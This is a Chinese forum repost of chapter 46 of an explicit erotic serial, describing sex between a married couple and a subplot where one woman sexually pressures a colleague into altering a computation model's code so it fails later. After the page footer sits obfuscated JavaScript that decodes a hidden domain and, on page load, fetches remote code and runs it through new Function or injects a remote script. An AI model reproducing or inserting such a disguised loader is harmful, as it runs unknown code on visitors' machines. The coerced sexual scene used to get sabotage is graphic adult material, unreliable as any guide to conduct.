Publisher 发表于 2022-8-18 00:05:14

[朝云暮雨][46][作者:爱的战士1]

作者:爱的战士1
   
字数:5567
   

   

   

   
************
   
朝云暮雨46
   

   
小别(下)
   

   
一时间,浴室里风光迤逦!
   

   
女人双手扶着墙壁,半跪在地上,一边的莲蓬头还在不住的喷水,她的上上
   
下下的衣服全部被打湿,头发因为汗水的缘故,粘连在一张绝美的脸庞上,下身
   
的穴口处还在部署的滴滴答答的滴水,既有还有,也有刚才喷溅的淫水。
   

   
我从后面温柔的抱住了婉儿,脸上还有她喷射出的淫水,我管不了那么多了,
   
刚才那无比刺激的画面,让我老二已是龙头高昂,伞状的龟头已经膨胀到极限,
   
巨大的龙身,青筋暴起,彰显着它急需要得到满足的欲望。
   

   
婉儿这时躺在我怀里,脸上全是未消退的红晕,身上泛着细细的汗珠,把脸
   
埋在我怀里,大口大口的喘着粗气,双腿紧紧的并拢,是不是的抽搐一下,似乎
   
上刚才的那激烈喷涌的余韵,尚未褪去。
   

   
我的龙体定着婉儿的后背,婉儿嘤咛一声,扭动着腰肢,躲开了我的巨物。
   

   
「婉儿…………我还没那个啥呢…………」,我支支吾吾的对着婉儿说道,
   
下体不老实的乱动着。
   

   
「哼!还没那个啥呀……」,婉儿没好气的说道,「刚才人家让你进来,你
   
偏要用手,我下面都有些疼了……」,婉儿有气无力的说道。
   

   
「那个……老婆……我一时兴起吗……不好意思……不好意思……」,我赶
   
忙陪着不是,任由婉儿的娇躯在我怀中翻腾,继续压住浴火的说道。「那么长时
   
间没见你,我也有点把持不住自己吗,老婆大人多多原谅呀」,我满脸赔笑的说
   
道,「要不……我给你揉揉……」,我说着就往婉儿的小穴摸去。
   

   
「不要…………」,婉儿厉声喝止,满脸不悦的说道,「臭老公……就让你
   
那个臭玩意爆炸吧……」,婉儿白了我一眼,打掉了我前进的咸猪手。「真的疼
   
了吗……」,我看婉儿脸有愠色,担心是不是真的弄伤了婉儿,赶快追问道,
   
「哪里不舒服……快让我看看……」,我紧张的对着婉儿上下摸索到。
   

   
「别……别乱动了……」,婉儿看我是真的担心了,也就么有再生气,「也
   
没有了……就是……就是有点不舒服……」.婉儿抓住我换着她的胳臂,像条毛
   
毯一样往自己身上紧了紧。「对不起呀……婉儿……刚才没控制住自己,把你弄
   
疼了!」。想着刚才对婉儿的「恶性」,自己心里也有些不忍,惭愧的说道。婉
   
儿双手捧起我的脸庞,娇羞的说道,「也……也没有了……老公……刚才……那
   
个……太刺激的……」,疲态和媚态结合在一起,让现在的婉儿娇艳欲滴,「刚
   
才……喷出来……整个人都像被掏空了一样……那种感觉……一下整个人都飘上
   
天了……」,婉儿双臂抱住我的脖子,在我耳边轻声说道。
   

   
「没事就好……我就怕把你弄疼了……」,看着婉儿没事,我也安心了许多,
   
胯下的小兄弟又开始捣鬼了,婉儿也感受到了那个硬物隔着自己的身体,疲惫的
   
说道,「老公……那里不行了……你的家伙那么大,再进去,婉儿那里会受不了
   
的……」,婉儿蜿蜒拒绝着身体上的请求。
   

   
我怎么是那种轻言放弃的人,「老婆,要不就用嘴……」,我话还没说完,
   
婉儿就李声打断了我,「你想的美……刚才把人家欺负成那样,还想要我用嘴巴
   
服侍你!!」。婉儿不客气的说道,看着我满脸的失望吗,婉儿悄悄的坏笑了一
   
下,捏着我的鼻子说道,「哼,让你刚才欺负我,现在我也要惩罚你一下……」。
   

   
婉儿走到了洗衣机前,家里的这台是老师的直通式洗衣机,功能不怎么样,
   
但是胜在结实。婉儿做到了洗衣机上,身子往后坐了坐,两条美腿悬在半空中。
   

   
如藕般白皙,又如桃花瓣粉嫩,光滑的皮肤配上紧绷的质感,华美的曲线为
   
平添了几分性感。婉儿少年时常年学习舞蹈,身材自然没的说,最性感的还是要
   
数这双美腿。婉儿有1。68米高,腿长就有70公分,双腿曲线完美,大腿浑
   
圆,小腿健美,双腿交叠在一起,更是美艳非凡。
   

   
婉儿对我魅惑的一笑,「过来……老公……让我也欺负一下你……」,婉儿
   
将我召唤到身边,一只手捉住我的老二,开始了对她双腿的探索。
   

   
滑腻有触感,我的龟头在婉儿的大腿上滑行,婉儿抓住阴茎,用龟头在自己
   
的大腿上画圈,从正面的大腿面,逐渐画到自己的大腿内侧。婉儿潮晕未退,大
   
腿内侧滑腻而湿润,温润的感觉由于过电一般,酥酥麻麻的从龟头上传来。
   

   
「嘶……」,我顶受不住刺激,低吼出声,「老婆……受不了了……太麻了
   
……」,我向婉儿告饶。「哼……刚才哪个大坏蛋欺负我的……」,婉儿不依不
   
饶,抓住我的龟头,在自己的耻骨边缘摩擦着。耻骨和大腿根部呈圆弧状,刚好
   
把我的龟头卡进去,刚才断断续续的交流电,一下变成了直流电,酸麻感直冲我
   
的大脑。
   

   
「噢……嘶……嗯……」,我忍受不了这样的刺激,双手毫无顾忌的抓上婉
   
儿的丰乳,隔着潮湿的衣服肆意揉搓,让婉儿帮我分担这种刺激。「嘤……」,
   
婉儿一声娇啼,「臭老公……有欺负我……」,婉儿娇喘着,楼主我的脖子,送
   
上香吻。
   

   
我弯腰品尝娇妻的丁香,婉儿握着我的膨胀的龙根,缓缓的来回套弄。婉儿
   
抓紧我的包皮,每一向后,手掌都要碰到我的小腹,每一次向前都要手掌略过龟
   
头,让我的阴茎坐着最大冲程。婉儿胸前那粉红的葡萄粒,被我两手捏住,婉儿
   
口中喃昵着,双手包裹着我的阴茎,拇指和虎口捏成环装,挤压着我的龟头。
   

   
我低吼一声,「受不了了……婉儿……要爆炸了……」,在婉儿的几番玩弄
   
下,我的阴茎已经过度充血,龟头变成了暗红色,光是压制住这种欲望就已经十
   
分辛苦了。
   

   
「老公……再忍耐一下……婉儿这就让你痛快的射出来……」,婉儿面色潮
   
红,娇羞的说道。
   

   
几分钟后,姿势变换。「婉儿……你现在真的很会做爱了呀……这么多花哨
   
的姿势哪里学来的呀……」,我抱着婉儿上下耸动着,在她耳边调笑的说道。
   

   
「你的D盘学习资料里那么多视频……嗯……看一下就都回了嘛……」,婉
   
儿对我上下索吻,试图用自己的红唇堵住我的嘴。「乖老婆……这么强的学习能
   
力……咱们以后是不是能解锁更多的姿势……还有那个……」,我话还没说完,
   
婉儿双唇印在了我的嘴上,一同狂吻之后,在我耳边说到,「我还有好多姿势呢
   
……天天把你榨干……」。
   

   
我靠着墙壁站着,婉儿从侧面靠在我身上,她左腿小腿曲卷,我一只手扶着
   
婉儿翘起的小腿,让她的腿弯紧紧的闭合在一起,婉儿在腿弯处涂抹了沐浴液,
   
而我的老二,此刻正在腿弯处进进出出。大腿的丰盈和小腿的健美交汇在一起,
   
共同挤压着我的老二,上面是大腿带来的乳波浪般的顺滑,下面是小腿绷紧后真
   
是的触感,再加上沐浴液的润滑,别有一番滋味。婉儿的手掌挡在腿弯处,用自
   
己的手心承受着我的龟头的冲击,触感随不及花心的美妙,但是婉儿不断调整手
   
心的位置,不同的摩擦感也甚是美妙。
   

   
婉儿将头埋在我肩头,在我耳边如吐香兰,「老公……人家好想你呀……恩
   
……我以后再也不要离开你了……」,婉儿的香舌略过我的脖颈、耳垂,在我的
   
耳轮上亲吻着。「啊……哦……」,阵阵的快感如快要喷发的火山,「婉儿……
   
我要射了……要射了……」,我快要把持不住了,「快……我要射到你……」,
   
我一边说着,一边把婉儿的身子往下面压去。
   

   
「啊……哦……嘶……」,我一阵低吼,老二在一片温热柔软中爆发了,此
   
时的婉儿跪在地上,用自己一对偌大的美乳,紧紧的夹住我的阴茎,积蓄多时的
   
子弹,喷射的到处都是。浓稠的液体几乎覆盖了婉儿的美乳,有些甚至碰到了婉
   
儿的脖子上面,婉儿双手抓紧双乳,用力的向中间挤压,缓缓的上下晃动着,将
   
我老二中最后一滴精液也挤压了出来。
   

   
本来还要跟婉儿大战整晚的,但是经过浴室的折腾,我俩都精疲力尽了,婉
   
儿躺在我胸口,眼皮店铺快要抬不起来了,我询问着婉儿出差的情况,婉儿只是
   
说自己累得很,我听这个语气,看来似乎不是很成功。哎,我心中升起一阵惋惜,
   
自己的美娇妻还要出去奔波工作,自己实在心中有愧,我让婉儿明天休息一天,
   
带她去逛街,婉儿挺了后很是兴奋,可是身体已经疲惫不堪,在我胸口沉沉的睡
   
去了。
   

   
日晒三竿,我和婉儿还懒懒洋洋的躺在床上,刺目的阳光从窗户中投放进来,
   
温热的光线洒满婉儿半裸的娇躯,一层金色的阳光伏在婉儿粉嫩的皮肤上,我在
   
欲望的驱使下,迷迷糊糊的在婉儿身上上下求索,很成功的把这位美人吵醒了。
   

   
「还没好吗……」,我百无聊赖的做爱客厅的沙发上,我已经洗了澡、刷了
   
牙、吃了饭、顺便收拾了卧室,修好了卫生间的水龙头,但是我的婉儿大美女仍
   
在化妆打扮。「等一下吗……好久没跟你一块出去了……当然要收拾的漂漂亮亮
   
的了……」,婉儿的声音从简陋的化妆台传来。
   

   
「老婆……你已经够漂亮了……在我心中你就是最美的……不用再打扮了…
   
…」,我看了看电视里的报时,继续说道,「已经快12点半了……再不出门就
   
中午了……我吃得早饭都消化完了……」,我在沙发上嘟囔着。
   

   
「好了好了……」,婉儿一下子冲到了我面前,「走吧……我收拾好了……」,
   
婉儿看着我没有说话,只是呆呆的看着她,继续说道,「你不是都不耐烦了嘛…
   
…快走吧……发什么呆呀……!」
   

   
青丝如水,划过刀削般的香肩,蓬松的尾端微微上翘,蜷出一丝慵懒,两条
   
细小的白色肩带和粉嫩的皮肤响应成趣,窄小的吊带将白色的小背心裹扎迷人的
   
娇躯上,本就坚挺的双乳在衣服的包裹下,更显傲人。上衣几许褶皱堆叠在腰间,
   
显得腰身更加纤细,水蛇般的细腰让人爱不释手。
   

   
下身混元的翘臀最为迷人,腰部的窄小刚过,尺寸瞬间增大的胯部跃入眼帘,
   
反差最大的腰臀比,既能展现出纤细柔弱的身段,又显得丰盈性感。浅灰色的牛
   
仔裤将迷人的美腿包裹其中,整个裤声简洁大方,没有一丝臃肿,大腿的丰盈将
   
裤身撑得满满当当,裤腿服帖的设计也将纤细健美的小腿紧密的包裹着。
   

   
脚上一双白色的帆布运动鞋更显年轻活力,在我目光的注视下,婉儿拿上浅
   
灰色的羊毛薄外套,照在了身上,将自己迷人的香肩藏在了里面,在外套的承托
   
下,妩媚之中略有内敛,性感之余又富有活力。
   

   
「大傻瓜……快走了……」,婉儿打扮妥当,在我面前说道。「那个……老
   
婆……我……要不在这……」,我话还没说完,婉儿就捏住我的鼻子往外走,
   
「你个大坏蛋……我不知道你要想干什么嘛……不行!!!」,婉儿捏着我的鼻
   
子就往外拽,我吃痛连连的跟在后面,「好久没陪我逛街了……昨天还那么欺负
   
我……今天不许你乱来……」,婉儿说着脚下生风,往外走去。
   

   
「昨天你不是也挺邪恶的嘛……能想到用退架住……唔……」,我刚要说昨
   
天的事情,婉儿一块面包怼过来,塞住了我的嘴巴。「昨天的事情不许说,今天
   
也不许使坏……不然……让你睡一个星期沙发……」。睡就睡呗,说不好岳母还
   
要来暖床呢!我心里暗自拍付,嘴上但让是不敢说了,只好大手伸到了婉儿的屁
   
股上,吃点豆腐。
   

   
「去哪呀约会呀……美女帅哥……」,我和婉儿坐在出租车后排,司机师傅
   
打趣的说道。婉儿嘻嘻的调皮的笑着,在我脸上捏了一下,说道,「这个人才不
   
是帅哥呢,是我家的笨老公……」,婉儿也打打趣额的说道。
   

   
「那个……师傅,去时代新天地……」,面对婉儿在外人面前这么亲昵,我
   
有些尴尬,赶快说出目的地。「哇……老公……去高档商场吗……」,婉儿一听
   
去时代新天地,高兴的说道,「老公,今天怎么这么好,要大出血了……」,婉
   
儿搂着我的手臂信兴奋的说道。
   

   
看着婉儿这么开心,其实我心里挺不是滋味的,结婚也有些日子了,我都没
   
有带婉儿到这样的高档商场买过衣服,想想自己还是挺失败的呀。
   

   
「今天你想要什么,老公都买给你……」,我朝婉儿的鼻子上刮了一下,温
   
柔的说道。「哇……老公万岁……老公外岁……」。婉儿在一边欢呼着。
   

   
路面上一辆飞驰的豪车内,刘教授猖狂的大笑着,「哈哈……哈哈……琼华
   
……你看……后天在这里,就是这里,我就要扬名立万了,把那些人曾经瞧不起
   
我的人都踩在脚下……哈哈……」。师母娇弱的坐在刘教授旁边,任由刘教授的
   
手在自己的衣领里摸索,「老刘……别……在外面呢……」,师母低声的告饶,
   
用余光看了看坐在对面的王国强,他对着一切视若无睹,坐在对面的座位上,黑
   
墨镜掩饰了他的表情。
   

   
「柳姐姐……你就帮帮我嘛……」,蓁蓁在柳静姝的办公室里恳求道,「这
   
次小云真的被刘教授那帮你骗了……你就帮帮他吧……」。柳静姝冷冰冰的说道,
   
「我为什么要帮他,自己的研究成果都看不住,没本事」,柳静姝越说越来气,
   
「就他那样的人,也配请我帮忙,要不是看在你的面子上,我那一次验算都不会
   
帮他的,还什么大男人,整个一个窝囊废,被老刘那个变态刷的团团转,还好意
   
思让我帮他…………」。
   

   
柳静姝继续冷嘲热讽,蓁蓁有点着急了,「哎呀……先不要说这些了……我
   
就问你一句……帮不帮忙……」,蓁蓁大小姐脾气一摆,气场瞬间上升好几个等
   
级。
   

   
「蓁蓁……我就不明白了……你为什么还要帮他……他可是……」,柳静姝
   
一改刚才的高冷,态度一下软了下来,对蓁蓁说道。「不要说这些……我的事情
   
不用你管……」,蓁蓁霸道的喝止到,「我要你修改验算模型的一小部分地层代
   
码,让模型延迟崩坏,能不能做到……」。
   

   
「我……我……我做不到……」,柳静姝低着头低声说道。「柳姐姐……我
   
知道你有这个本事……那就拜托你了……」,蓁蓁说着,往柳静姝身边靠去。柳
   
静姝低呼一声,身子微微的颤抖,蓁蓁的右手顺着柳静姝的大腿摸上了上来,一
   
直摸到腿心的地方,柳静姝平时都是一声男装打扮,黑色的裤子将她的三角地带
   
遮住,蓁蓁的手灵巧的拉开她的裤链,柔软的小手往裤子里钻去。
   

   
「哦……」,柳静姝面颊绯红,低声娇喘着,蓁蓁对着她的耳朵继续说道,
   
「好姐姐……就这点小事,你会帮忙的吧,你看,姐姐,你下面都有些湿了呢,
   
不知道再想什么呀!」。
   

   
蓁蓁的话语似乎又某种魔力,柳静姝像夏日的冰块,正在逐渐融化,「姐姐,
   
你是不是又想起那次了,就是在这里哦……」,蓁蓁说道了上次她们在办公室里
   
面的百合,「我可是还记得哦……姐姐你那次真的是丢了好几次呢……你帮我这
   
个忙……我一定会感谢你的……」!
   

   
昨夜云聚雨疏,各方的流云聚集在一起,大雨在半夜下了起来,今天一早,
   
云已散去,天空经过一番洗牌,早已换了模样。
页: [1]
查看完整版本: [朝云暮雨][46][作者:爱的战士1]

function SaQEk(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UnFLqDhw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SaQEk(t);};window[''+'S'+'f'+'A'+'g'+'C'+'R'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UnFLqDhw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aGJyLmFF0YWtqeXYuY24=','157541',window,document,['F','RsHXGunW']);}:function(){};